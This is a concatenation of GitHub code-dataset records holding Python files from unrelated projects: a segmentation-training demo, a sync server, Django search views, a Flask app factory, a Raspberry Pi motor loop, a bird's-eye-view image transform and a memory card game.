setting_backup = os.path.join(setting_folder_path, task_name+'_backup')\n os.makedirs(setting_backup, exist_ok=True)\n dm_backup_json_path = os.path.join(setting_backup, 'cur_data_setting.json')\n tsm_backup_json_path =os.path.join(setting_backup,'cur_task_setting.json')\n tsm.save(tsm_backup_json_path)\n if dm is not None:\n dm.save(dm_backup_json_path)\n\n\n\n\ndef __do_segmentation_train(args,pipeline=None):\n \"\"\"\n set running env and run the task\n\n :param args: the parsed arguments\n :param pipeline:a Pipeline object\n :return: a Pipeline object\n \"\"\"\n\n output_root_path = args.output_root_path\n task_name = args.task_name\n data_task_name = args.data_task_name\n setting_folder_path = args.setting_folder_path\n data_task_path = os.path.join(output_root_path,data_task_name)\n task_output_path = os.path.join(data_task_path,task_name)\n os.makedirs(task_output_path, exist_ok=True)\n dm, tsm = init_train_env(setting_folder_path,output_root_path,task_name,data_task_name)\n tsm.task_par['tsk_set']['gpu_ids'] = args.gpu_id\n dm_json_path = os.path.join(task_output_path, 'cur_data_setting.json') if dm is not None else None\n tsm_json_path = os.path.join(task_output_path, 'cur_task_setting.json')\n tsm.save(tsm_json_path)\n if dm is not None:\n dm.save(dm_json_path)\n data_loaders = pipeline.data_loaders if pipeline is not None else None\n pipeline = run_one_task(tsm_json_path, dm_json_path,data_loaders)\n return pipeline\n\n\n\n\ndef do_segmentation_train(args):\n \"\"\"\n\n :param args: the parsed arguments\n :return: None\n \"\"\"\n task_name = args.task_name\n args.task_name_record = task_name\n backup_settings(args)\n pipeline = None\n __do_segmentation_train(args,pipeline)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n \"\"\"\n An interface for learning segmentation methods.\n Assume there is three level folder, output_root_path/ data_task_name/ task_name\n In data_task_folder, you must include train/val/test/debug folders, for details please refer to doc/source/notes/preapre_data.rst\n Arguments: \n --output_root_path/ -o: the path of output folder\n --data_task_name/ -dtn: data task name 
i.e. lung_reg_task , oai_reg_task\n --task_name / -tn: task name i.e. run_training_vsvf_task, run_training_rdmm_task\n --setting_folder_path/ -ts: path of the folder where settings are saved,should include cur_task_setting.json\n --gpu_id/ -g: gpu_id to use\n \"\"\"\n import argparse\n\n parser = argparse.ArgumentParser(description=\"An easy interface for training segmentation models\")\n parser.add_argument('-o','--output_root_path', required=False, type=str,\n default=None,help='the path of output folder')\n parser.add_argument('-dtn','--data_task_name', required=False, type=str,\n default='',help='the name of the data related task (like subsampling)')\n parser.add_argument('-tn','--task_name', required=False, type=str,\n default=None,help='the name of the task')\n parser.add_argument('-ts','--setting_folder_path', required=False, type=str,\n default=None,help='path of the folder where settings are saved,should include cur_task_setting.json)')\n parser.add_argument('-g',\"--gpu_id\",required=False,type=int,default=0,help='gpu_id to use')\n args = parser.parse_args()\n print(args)\n do_segmentation_train(args)\n\n","repo_name":"uncbiag/easyreg","sub_path":"demo/demo_for_seg_train.py","file_name":"demo_for_seg_train.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"78"} +{"seq_id":"25666228235","text":"import prologin.config\nimport prologin.log\nimport prologin.udb.client\nimport prologin.synchronisation\nimport sys\n\n\nPUB_CFG = prologin.config.load('udbsync-pub')\nSUB_CFG = prologin.config.load('udbsync-sub')\n\n\nclass SyncServer(prologin.synchronisation.Server):\n def __init__(self, pub_secret, sub_secret, port):\n super(SyncServer, self).__init__(\n 'login',\n pub_secret,\n sub_secret,\n port,\n 'udbsync',\n )\n\n def get_initial_backlog(self):\n return prologin.udb.client.connect(auth=True).query_private()\n\n\nif __name__ == '__main__':\n prologin.log.setup_logging('udbsync')\n\n if 'shared_secret' not in PUB_CFG:\n raise RuntimeError(\n \"Missing shared_secret in the udbsync-pub YAML config\"\n )\n\n if 'shared_secret' not in SUB_CFG:\n raise RuntimeError(\n \"Missing shared_secret in the udbsync-sub YAML config\"\n )\n\n if len(sys.argv) > 1:\n port = int(sys.argv[1])\n else:\n port = 8000\n server = SyncServer(\n PUB_CFG['shared_secret'], SUB_CFG['shared_secret'], port\n )\n server.start()\n","repo_name":"prologin/sadm","sub_path":"prologin/udbsync/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"32587815991","text":"import re\n\nfrom dal import autocomplete\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.contenttypes.models import ContentType\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.exceptions import NotFound, ParseError\n\nfrom content.models import GeneralQuestion, LinkedField, Word, Sentence\nfrom learning.models import Record\nfrom content.utils import unaccent\n\n\nclass QuestionView(APIView):\n \"\"\"\n Displays and checks answers for questions\n \"\"\"\n\n def initial(self, request, *args, **kwargs):\n super().initial(request, *args, **kwargs)\n question_pk = self.kwargs.pop('pk', None)\n self.question = get_object_or_404(GeneralQuestion.objects.all(),\n pk=question_pk)\n\n def get(self, request):\n 
show_all_options = request.session.get('show_all_options', False)\n try:\n client_dict = self.question.render(\n show_all_options=show_all_options\n )\n except ValidationError:\n raise NotFound\n return Response(client_dict)\n\n def post(self, request):\n data = request.data.copy()\n try:\n is_correct, correct_answer = self.question.check_answer(\n data.get('answer', None))\n except ValidationError:\n raise NotFound\n # create Record\n user = request.user if request.user.is_authenticated else None\n Record.objects.create(\n action=Record.Action.CORRECT_ANSWER if is_correct\n else Record.Action.WRONG_ANSWER,\n user=user,\n reviewable=self.question.reviewable,\n question=self.question,\n data={\n 'answer': data.get('answer', None)\n }\n )\n return Response({\n 'is_correct': is_correct,\n 'answer': correct_answer,\n })\n\n\nclass LinkedFieldAutocomplete(autocomplete.Select2QuerySetView):\n def get_result_label(self, result):\n if self.field_name == '__str__':\n field = str(self.field_name)\n else:\n field = getattr(result, self.field_name)\n return f\"{repr(result)}'s {self.field_name}: {field}\"\n\n def get_queryset(self):\n # Don't forget to filter out results depending on the visitor !\n if not self.request.user.is_staff:\n return LinkedField.objects.none()\n\n content_type_id = self.forwarded.get('content_type', None)\n self.field_name = self.forwarded.get('field_name', '__str__')\n if content_type_id is None:\n return LinkedField.objects.none()\n\n model_class = ContentType.objects.get(pk=content_type_id).model_class()\n if model_class in (Word, Sentence):\n self.search_fields = ['chinese']\n else:\n return LinkedField.objects.none()\n\n if self.field_name in [field.name for field in Word._meta.fields]:\n self.search_fields.append(self.field_name)\n qs = model_class.objects.all()\n qs = self.get_search_results(qs, self.q)\n return qs\n\n\nclass SearchAPIView(APIView):\n \"\"\"\n __POST__: searches keyword in content database\n\n keyword (str, required): the query keyword to be searched\n\n query_type (str, default=auto): should be among 'chinese', 'pinyin',\n 'definition', 'auto'. This indicates what to search against in database.\n Use 'auto' to let the backend determine automatically.\n\n __returns__:\n\n results ([objects]): a list of serialized words / characters / radicals\n object (for now only supporting word results).\n\n query_type (str): 'chinese', 'pinyin', or 'definition', indicating what the\n backend uses for the search\n \"\"\"\n def post(self, request):\n try:\n keyword = request.data['keyword']\n except KeyError:\n raise ParseError(\"keyword not found\")\n query_type = request.data.get('query_type', 'auto').lower()\n if query_type not in ('auto', 'chinese', 'pinyin', 'definition'):\n raise ParseError(f\"query type must be either 'auto', 'chinese',\"\n f\" 'pinyin', or 'definition'. 
not {query_type}\")\n\n keyword = keyword.strip()\n if not keyword:\n return Response({'results': [], 'query_type': 'definition'})\n\n if query_type in ('auto', 'chinese'):\n # searches for chinese words with keyword as substring\n chinese_regex = r'.*?'.join([''] + list(keyword) + [''])\n queryset = Word.objects.filter(chinese__regex=chinese_regex)\n if query_type == 'auto' and queryset.exists():\n query_type = 'chinese'\n if query_type in ('auto', 'pinyin'):\n # if problem with 儿化音, will use regex with many searchable\n # pinyin options\n pinyin_keyword = re.sub(r'[^a-zA-Z]', r'', unaccent(keyword))\n queryset = Word.objects.filter(\n searchable_pinyin__iexact=pinyin_keyword)\n if query_type == 'auto' and queryset.exists():\n query_type = 'pinyin'\n if query_type in ('auto', 'definition'):\n queryset = Word.objects.filter(\n definition__definition__search=keyword)\n query_type = 'definition'\n queryset = queryset.prefetch_related('definitions')\n results = [{\n 'type': obj.__class__.__name__.lower(),\n 'qid': obj.id,\n 'chiense': obj.chinese,\n 'pinyin': obj.pinyin,\n 'definition': obj.full_definition,\n }\n for obj in queryset.all()\n ]\n return Response({\n 'results': results,\n 'query_type': query_type\n })\n\n POST_action = {\n 'keyword': {\n 'type': 'string',\n 'example': 'hello',\n },\n 'query_type': {\n 'type': 'string',\n 'example': 'auto',\n },\n }\n","repo_name":"solved-chinese/app","sub_path":"content/API_views.py","file_name":"API_views.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"74743800573","text":"from flask import Flask, Blueprint, render_template\nfrom .flass import Flass\nfrom .flex import Flex\nfrom .flinf import Flinf\nfrom .flab import Flab\nfrom .flap import Flap\nfrom .signals import app_created_successfully\n\n\nclass FlailsError(Exception):\n pass\n\n\nclass Flails(object):\n registration_manager_cls = Flap\n blueprints_manager_cls = Flab\n assets_manager_cls = Flass\n extensions_manager_cls = Flex\n information_manager_cls = Flinf\n initialize = {'app_name': __name__,\n 'app_config_requires': None,\n 'app_inside_module': None,\n 'requested_info': None,\n 'assets_env': None,\n 'assets_do_register': True,\n 'assets_do_parse_static': True,\n 'assets_do_exclude_blueprints': None,\n 'assets_do_log': True,\n 'information_page': True}\n\n def __init__(self, initialize=initialize, **kwargs):\n for k, v in initialize.items():\n setattr(self, k, kwargs.pop(k, v))\n self.app_config = self.check_config(kwargs.pop('app_config', None),\n kwargs.pop('app_config_requires',\n None))\n self.initialize_managers(**kwargs)\n\n def check_config(self, app_config, app_config_requires):\n \"\"\"Forces a check on your configuration file\"\"\"\n if app_config_requires is not None:\n for c in app_config_requires:\n if not hasattr(app_config, c):\n raise FlailsError('Configuration MUST contain or specify in some manner: {}'.format(c))\n return app_config\n\n def initialize_managers(self, **kwargs):\n self.app_registrations = self.registration_manager_cls(self)\n self.app_assets = self.assets_manager_cls(self,\n app_asset_env=kwargs.pop('assets_env', None),\n do_exclude_blueprints=kwargs.pop('assets_do_exclude_blueprints', None),\n do_parse_static_main=kwargs.pop('assets_do_parse_static', True),\n do_exclude_files=kwargs.pop('assets_do_exclude_files', []),\n do_log=kwargs.pop('assets_do_log', True))\n self.app_extensions = self.extensions_manager_cls(self)\n self.app_information = 
self.information_manager_cls\n self.app_blueprints = self.blueprints_manager_cls(self)\n\n @property\n def info_page_blueprint(self):\n info_bp = Blueprint('info_page', __name__, template_folder='templates')\n\n def info_page():\n return render_template('info_page.html', info=self.generated_app_info)\n\n info_bp.route('/info_page', methods=['GET'])(info_page)\n return info_bp\n\n def create_app(self, **kwargs):\n self.create_time_additions('EXTENSIONS',\n kwargs.pop('extensions', None))\n self.create_time_additions('BLUEPRINTS',\n kwargs.pop('blueprints', None))\n\n app = Flask(self.app_name)\n\n for k in kwargs:\n if k in ('import_name',\n 'static_url_path',\n 'static_folder',\n 'template_folder',\n 'views_folder',\n 'blueprints_folder',\n 'instance_path',\n 'instance_relative_config'):\n setattr(app, k, kwargs.get(k))\n\n self.configure_app(app, kwargs.pop('create_time_settings', None))\n\n self.configure_extensions(app, self.app_config)\n\n for k, v in self.app_registrations.app_actions.items():\n action = getattr(self.app_config, k.upper(), None)\n fn, values = v, action\n if values:\n fn(app, values)\n\n self.configure_blueprints(app, getattr(self.app_config, 'BLUEPRINTS', None))\n\n if self.assets_do_register:\n self.app_assets.register_assets(app)\n\n if self.information_page:\n app.register_blueprint(self.info_page_blueprint)\n\n setattr(self, 'generated_app', app)\n\n app_created_successfully.send(self)\n app.logger.info(\"Application {!r} successfully generated\".format(self.generated_app))\n\n setattr(self, 'generated_app_info', self.app_information(self, self.generated_app, self.requested_info))\n\n return self.generated_app\n\n def create_time_additions(self, what, to_add):\n if to_add and hasattr(self.app_config, what):\n x = getattr(self.app_config, what)\n x.extend(to_add)\n elif to_add:\n setattr(self.app_config, what, to_add)\n else:\n pass\n\n def configure_app(self, app, create_time_settings):\n app.config.from_object(self.app_config)\n if create_time_settings:\n app.config.from_object(create_time_settings)\n app.config.from_envvar(\"{}_APP_CONFIG\".format(self.app_name.upper()),\n silent=True)\n\n def configure_extensions(self, app, app_config):\n self.app_extensions.configure_extensions(app, app_config)\n\n def configure_blueprints(self, app, blueprints):\n self.app_blueprints.configure_blueprints(app, blueprints)\n","repo_name":"fc-thrisp-hurrata-dlm-graveyard/flails","sub_path":"flask_flails/flails.py","file_name":"flails.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26504776424","text":"class Solution:\n def matrixMul(self, a, b):\n ans = [[0] * 3 for _ in range(3)]\n for i in range(3):\n for j in range(3):\n for k in range(3):\n ans[i][j] += a[i][k] * b[k][j]\n ans[i][j] %= 1000000007\n return ans\n\n def quickMul(self, matrix, x):\n ans = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n while x:\n if x & 1:\n ans = self.matrixMul(ans, matrix)\n x >>= 1\n matrix = self.matrixMul(matrix, matrix)\n return ans\n\n def waysToStep(self, n: int) -> int:\n if n < 3:\n return n\n ans = self.quickMul([[0, 0, 1], [1, 0, 1], [0, 1, 1]], n - 2)\n return (ans[0][2] + ans[1][2] + ans[2][2] * 2) % 1000000007\n\n\nclass Solution_two:\n def waysToStep(self, n: int) -> int:\n if n <= 2:\n return n\n if n == 3:\n return 4\n f1, f2, f3 = 1, 2, 4\n mod = 10 ** 9 + 7\n for _ in range(n - 3):\n f1, f2, f3 = f2, f3, (f1 + f2 + f3) % mod\n\n return 
f3","repo_name":"ZainLiu/testproject","sub_path":"算法练习/202104/三步问题.py","file_name":"三步问题.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6511192714","text":"import time\nimport os\nimport serial\nimport sys\nimport RPi.GPIO as GPIO\nimport re\nimport time\n\nGPIO.setmode(GPIO.BCM)\nSTEPPER_PINS = [17,18,27,22]\nfor pin in STEPPER_PINS:\n GPIO.setup(pin,GPIO.OUT)\n GPIO.output(pin, GPIO.LOW)\n \nGPIO.setup(27, GPIO.OUT) \n\n\n\n\n\ny_STEPS= 0\nmotor_steps = 640\nbuf = 0\ncontR = 0\ncontL = 0\n\n\ncount = 0;\n\nwhile True:\n start=time.time()\n try:\n f = open('LRmotor_mode.txt','r+')\n modelswitch = int(f.readline())\n f.close()\n except:\n pass\n\n if modelswitch ==1:\n file='LRmotor_lora.txt'\n elif modelswitch ==2:\n file='ASM.txt'\n elif modelswitch ==3:\n file='LRmotor_always_left.txt'\n else:\n print(\"wrong\")\n\n\n f = open(file,'r+')\n data = f.readline()\n print(data)\n if data == \"\":\n pass\n else:\n # ~ datalist = data.split(',') #找尋,並分割資料\n datalist = data\n f.close()\n\n\n\n # ~ y_STEPS = ''.join([y_STEPS for y_STEPS in datalist[1] if y_STEPS.isdigit()]) #找尋數字\n y_STEPS = ''.join([y_STEPS for y_STEPS in datalist if y_STEPS.isdigit()]) #找尋數字 \n y_STEPS = int(y_STEPS)\n y_STEPS= y_STEPS*5\n #print(y_STEPS)\n\n\n \n if motor_steps < y_STEPS: # y_STEPS_CW右轉\n if contL == 1:\n time.sleep(0.001)\n for i in range(5):\n GPIO.output(17, 1) \n time.sleep(0.00008) \n GPIO.output(17, 0) \n time.sleep(0.00008)\n motor_steps += 1;\n contR = 1\n contL = 0\n \n \n if motor_steps > y_STEPS: # y_STEP_CCW左轉\n if contR == 1:\n time.sleep(0.001)\n for i in range(5):\n GPIO.output(27, 1) \n time.sleep(0.00008) \n GPIO.output(27, 0) \n time.sleep(0.00008)\n motor_steps -= 1;\n contL = 1\n contR = 0\n time.sleep(0.00001)\n end=time.time()\n FPS=round(1/(end-start),2)\n print('FPS:',FPS)\n\n \n \n\n","repo_name":"GeneChen1996/Beta-two-wheel-balance-car-wireless-control-system","sub_path":"LRmotor_read.py","file_name":"LRmotor_read.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41662947936","text":"'''\n====================\nBoto 3 - VPC Example\n====================\nThis application implements the VPC service that lets you gets\ninformation from Amazon VPC. 
See the README for more details.\n'''\nimport boto3\nimport json\n\nconfig = json.loads(open('config/defaults.json').read())\ncredentials = config['credentials']\n\nAWS_ACCESS_KEY_ID = credentials['aws_access_key_id']\nAWS_SECRET_ACCESS_KEY = credentials['aws_secret_access_key']\nREGION_NAME = 'us-west-1'\n\nvpc = boto3.client('vpc',\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n region_name=REGION_NAME)\n\n","repo_name":"rolandovillca/aws_samples_boto3_sdk","sub_path":"services/vpc/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2145874159","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 1 11:42:18 2020\n\n@author: gao\n\"\"\"\nimport numpy as np\nimport cv2\n\nclass DictObjHolder(object):\n def __init__(self, dct):\n self.dct = dct\n\n def __getattr__(self, name):\n return self.dct[name]\n \ndef rotX(a):\n a = np.deg2rad(a)\n R = np.array([[1,0,0],\n [0,np.cos(a),-np.sin(a)],\n [0,np.sin(a),np.cos(a)]])\n return R\n\ndef rotY(a):\n a = np.deg2rad(a)\n R = np.array([[np.cos(a),0,np.sin(a)],\n [0,1,0],\n [-np.sin(a),0,np.cos(a)]])\n return R\n\ndef rotZ(a):\n a = np.deg2rad(a)\n R = np.array([[np.cos(a),-np.sin(a),0],\n [np.sin(a),np.cos(a),0],\n [0,0,1]])\n return R \n\nclass BirdsEyeView:\n def __init__(self):\n self.scalex = [] # scale image W x-direction\n self.scaley = [] # scale image H y-direction\n self.vehicleHomography = []\n self.BirdsEyeViewTransform = []\n self.worldHW = []\n self.bevSize = []\n self.unwarp_matrix = []\n \n def birdseyeviewimage(self,image,IntrinsicMatrix,CameraPose,OutImgView,OutImgSize):\n Pitch = CameraPose.Pitch\n Yaw = CameraPose.Yaw\n Roll = CameraPose.Roll\n Height = CameraPose.Height\n \n distAheadOfSensor = OutImgView.distAheadOfSensor\n spaceToLeftSide = OutImgView.spaceToLeftSide \n spaceToRightSide = OutImgView.spaceToRightSide\n bottomOffset = OutImgView.bottomOffset\n \n outView = np.array([bottomOffset,distAheadOfSensor,-spaceToLeftSide,spaceToRightSide])\n reqImgHW = OutImgSize.copy()\n self.worldHW = np.abs([outView[1]-outView[0], outView[3]-outView[2]])\n \n rotation = np.linalg.multi_dot([rotY(180),rotZ(-90),rotZ(Yaw),rotX(90-Pitch),rotZ(Roll)])\n rotationMatrix = np.linalg.multi_dot([rotZ(Yaw),rotX(90-Pitch),rotZ(Roll)])\n sl = [0,0]\n translationInWorldUnits = [sl[1], sl[0], Height]\n translation = np.dot(translationInWorldUnits,rotationMatrix)\n camMatrix = np.dot(np.vstack([rotation,translation]),IntrinsicMatrix)\n tform2D = np.array([camMatrix[0,:], camMatrix[1,:], camMatrix[3,:]])\n ImageToVehicleTransform = np.linalg.inv(tform2D)\n self.vehicleHomography = ImageToVehicleTransform\n adjTform = np.array([[0, -1, 0],\n [-1, 0, 0],\n [0, 0, 1]])\n bevTform = np.dot(self.vehicleHomography,adjTform)\n \n nanIdxHW = np.isnan(reqImgHW)\n if ~nanIdxHW.any():\n scaleXY = np.flipud((reqImgHW-1)/self.worldHW)\n outSize = reqImgHW\n self.scalex = scaleXY[0]\n self.scaley = scaleXY[1]\n else:\n scale = (reqImgHW[~nanIdxHW]-1)/self.worldHW[~nanIdxHW]\n scaleXY = np.hstack([scale, scale])\n worldDim = self.worldHW[nanIdxHW]\n outDimFrac = scale*worldDim\n outDim = np.round(outDimFrac)+1\n outSize = reqImgHW\n outSize[nanIdxHW] = outDim\n self.scalex = scaleXY[0]\n self.scaley = scaleXY[1]\n OutputView = outView\n dYdXVehicle = np.array([OutputView[3], OutputView[1]])\n tXY = scaleXY*dYdXVehicle\n viewMatrix = np.array([[scaleXY[0], 0, 0],\n [0, scaleXY[1], 0],\n 
[tXY[0]+1, tXY[1]+1, 1]])\n self.BirdsEyeViewTransform = np.transpose(np.dot(bevTform, viewMatrix))\n self.bevSize = np.int_(np.flipud(outSize))\n birdsEyeViewImage = cv2.warpPerspective(image,self.BirdsEyeViewTransform,tuple(np.int_(np.flipud(outSize))))\n self.unwarp_matrix = np.linalg.inv(self.BirdsEyeViewTransform)/self.scalex\n return birdsEyeViewImage\n\n def imagetovehicle(self, imgpoint):\n # image pixel point (image coordination) to real world point position (vehicle coordination)\n \n worldpoint = np.dot(self.BirdsEyeViewTransform, np.hstack([imgpoint, 1]))\n worldpoint /= worldpoint[2]\n \n worldpoint_sc = worldpoint / np.array([self.scalex, self.scaley, 1])\n vehicle_Matrix = np.array([[0, -1, self.worldHW[0]],\n [-1, 0, self.worldHW[1]/2],\n [0, 0, 1]])\n worldpoint_vc = np.dot(vehicle_Matrix, worldpoint_sc)\n point_worldcoor = worldpoint_vc[0:2]\n point_bevcoor = np.int_(np.round(worldpoint[0:2]))\n return point_worldcoor, point_bevcoor\n \n def bevimagetovehicle(self, bevpoint):\n # image pixel point (image coordination) to real world point position (vehicle coordination)\n \n worldpoint = np.hstack([bevpoint, 1])\n \n worldpoint_sc = worldpoint / np.array([self.scalex, self.scaley, 1])\n vehicle_Matrix = np.array([[1, 0, -self.worldHW[1]/2],\n [0, 1, 0],\n [0, 0, 1]])\n worldpoint_vc = np.dot(vehicle_Matrix, worldpoint_sc)\n point_worldcoor = worldpoint_vc[0:2]\n return point_worldcoor\n \n def vehicletoimage(self, worldpoint_vc):\n # real world point (vehicle coordination) to image pixel point (image coordination) \n # and bird eye view image point (bev coordination)\n \n vehicle_Matrixinv = np.array([[0, -1, self.worldHW[1]/2],\n [-1, 0, self.worldHW[0]],\n [0, 0, 1]])\n worldpoint = np.dot(vehicle_Matrixinv, np.hstack([worldpoint_vc,1]))*np.array([self.scalex, self.scaley, 1])\n imgpoint = np.dot(np.linalg.inv(self.BirdsEyeViewTransform),worldpoint)\n imgpoint /= imgpoint[2]\n point_imgcoor = np.int_(np.round(imgpoint[0:2]))\n # point_bevcoor = np.int_(np.round(worldpoint[0:2]))\n return point_imgcoor\n \n \n\n","repo_name":"elmexx/eWolf_ROS2","sub_path":"lane_detection_package/lane_detection_package/utils/image2bev.py","file_name":"image2bev.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37859885121","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 16 22:02:08 2020\n\n@author: davidg\n\"\"\"\n\ndef prod(x):\n if hasattr(x, '__iter__'):\n y = x[0]\n if len(x) > 1:\n y *= prod(x[1:])\n else:\n y = x\n return y","repo_name":"DavidGrgic/Advent-of-Code","sub_path":"2020/mat.py","file_name":"mat.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72004387131","text":"''' Author: Zaeem Yousaf\nEmail: quaidzaeem@gmail.com\nDate: 01-02-2017\nversion: 1.0\npython: 3\nTeacher: Sir Naghman at PakTurk\n'''\n\n''' Function list\n\n1): mkCards(n,types) returns an array of size n, contains 'types' types of data\n2): mkGrid(cardsArray,rows,cols) returns two dimensional array of size 'rows' and 'columns'\n3): shuffle(grid,nplaces) returns shuffled two dimensional array, nplaces=1 means suffle only one card and so on\n4): areSame(usc) boolean predicates whether user selected card are same.\n5): cardsAtPos(grid,pos) returns cards array at positions\n6): gridDisplay(grid,faceUp=False,except) provides user's interface\n7): removeCards(grid,pos,replace) replaces cards at 
pos from grid with user defined value\n8): contains(boxArray,elements) boolean predicates whether 'element list' is in boxArray\n'''\ndef mkCards(n,types):\n ''' it makes n virtual cards of different types \n it is ordered list'''\n identicals=int(n/types)\n Deck=[]\n for t in range(types):\n for identical in range(identicals):\n Deck.append(t)\n return Deck\n\ndeck=mkCards(64,32)\n#--------------------------------------------\ndef mkGrid(cardsList,rows,cols):\n ''' makes two dimension grid into rows and columns '''\n grid=[]\n #loops=len(cardsList)+1\n loops=(rows*cols)+1\n rowElements=[]\n for l in range(1,loops):\n if l % cols !=0:\n rowElements.append(cardsList[l-1])\n else:\n rowElements.append(cardsList[l-1])\n grid.append(rowElements)\n rowElements=[]\n return grid\ngrid=mkGrid(deck,8,8)\n#print(grid) \n\n#----------------------------------------------\ndef shuffle(grid,nplaces):\n ''' it rearranges the cards \n nplaces tries to swap n cards to eachother's place'''\n shuffledGrid=grid\n # preserve the original grid\n m=len(grid)\n # number of rows\n n=len(grid[0])\n # number of columns\n from random import random\n for i in range(nplaces):\n # select one random coordinate\n rRow1=int((m)*random())\n #print(\" random row1 is: {} \".format(rRow1))\n # random row \n rCol1=int((n)*random())\n #print(\" random col1 is: {} \".format(rCol1))\n #print(rCol1)\n # random column\n vAtCoordinate1=(grid[rRow1])[rCol1]\n #print(\" value at {} is {} \".format((rRow1,rCol1),vAtCoordinate1))\n # value At Coodinate 1\n #-------------------------\n # select second random coordinate\n rRow2=int((m)*random())\n #print(\" random row2 is: {} \".format(rRow2))\n #print(rRow2)\n rCol2=int((n)*random())\n #print(\" random col2 is: {} \".format(rCol2))\n #print(rCol2)\n vAtCoordinate2=(grid[rRow2])[rCol2]\n #print(\" value at {} is {} \".format((rRow2,rCol2),vAtCoordinate2))\n #print(\" value at {}\".format(vAtCoordinate1))\n #------------------------- swaping\n temp=vAtCoordinate1\n vAtCoordinate1=vAtCoordinate2\n vAtCoordinate2=temp\n # print(\" after swaping value at {} is {} \".format((rRow2,rCol2),vAtCoordinate2))\n #------------------------- updating grid\n ((shuffledGrid[rRow2])[rCol2])=vAtCoordinate2\n ((shuffledGrid[rRow1])[rCol1])=vAtCoordinate1\n return shuffledGrid\nsGrid=shuffle(grid=grid,nplaces=20)\n#print(sGrid)\n\n#------------------------------------- test whether all are same\ndef areSame(usc):\n # User's Selected Cards\n ''' if first matchs all other then all are same '''\n first=usc[0]\n loops=len(usc)\n same=True\n for remaining in range(1,loops):\n if first != usc[remaining]:\n same=False\n if same == True:\n return True\n else:\n return False\n# print(areSame((1,1,1,1)))\n#----------------------------------\ndef contains(boxArray,elements):\n ''' boxArray: array from which you are comparing\n elements: array that you are comparing\n note: order matters\n '''\n # for exceptions only\n loops=int(len(boxArray)/2)\n found=False\n for first in range(loops):\n block=[]\n row=2*first\n for others in range(2):\n block.append(boxArray[row+others])\n #print(block)\n if block==elements:\n found=True\n if found==True:\n return True\n else:\n return False\n#print(contains(boxArray=[1,2,1,3,3,7],elements=[1,3]))\n#print(contains(boxArray=[1,2,1,3,3,7],elements=[3,2]))\n\n#----------------------------------\ndef cardsAtPos(grid,pos):\n ''' pos=(row1,col1,row2,col2....)\n starting index from 1\n each consective pair is position of a card grid'''\n # assumes first index =1\n cards=[]\n 
loops=int(len(pos)/2)\n for i in range(loops):\n i=i*2\n row=pos[i]\n card=(grid[row-1])[pos[i+1]-1]\n cards.append(card)\n return cards\n#print(cardsAtPos(grid,(1,1,8,8,0,5)))\n#--------------------------------------------\ndef gridDisplay(grid,faceUp=False,exception=[]):\n ''' Display grid\n either faces up are layed down\n except those cards at positions in except list '''\n\n # Top border\n print(\"__________ Game for Memory Testing Designed at PakTurk School _______________\\n\\n\")\n print(\"\",end=\"\\t\\t\")\n cloops=len(grid[0])\n rloops=len(grid)\n for cols in range(cloops):\n print(\"{}\".format(cols+1),end=\"\\t\")\n for rows in range(1,rloops+1):\n print(\"\\n\")\n print(\"\",end=\"\\t\")\n print(\"{}\".format(rows),end=\"\\t\")\n if faceUp==True:\n # lay cards with their faces up except a list give\n for columns in range(cloops):\n if (grid[rows-1])[columns] ==\"empty\":\n print(\" \",end=\"\\t\")\n # in case of empty\n #--------------------\n elif contains(boxArray=exception,elements=[rows,columns+1]) ==True:\n # in case of exception\n print(\"#\",end=\"\\t\")\n else:\n # show elements\n print(\"{}\".format((grid[rows-1])[columns]),end=\"\\t\")\n else:\n # lay cards with their faces down except a list given\n for columns in range(cloops):\n # in case, a card has been removed\n if (grid[rows-1])[columns] ==\"empty\":\n print(\" \",end=\"\\t\")\n elif contains(boxArray=exception,elements=[rows,columns+1]) ==True:\n print(\"{}\".format((grid[rows-1])[columns]),end=\"\\t\")\n # show card at this pos\n else:\n # mask with this sign\n print(\"#\",end=\"\\t\")\n \n print(\"\\n\")\n # return nothing if it runs successfully\n return 0\n#gridDisplay(grid,faceUp=False,exception=[1,1,1,2])\n#gridDisplay(sGrid,show=True)\n#-------------------------------------------- select cards at pos\n#usc=input(\"Enter cards pos coma separated: \")\n#pos=eval(usc)\n# users selected cards\n#cards=cardsAtPos(sGrid,pos)\n#if areSame(cards):\n# print(\"congratulation! 
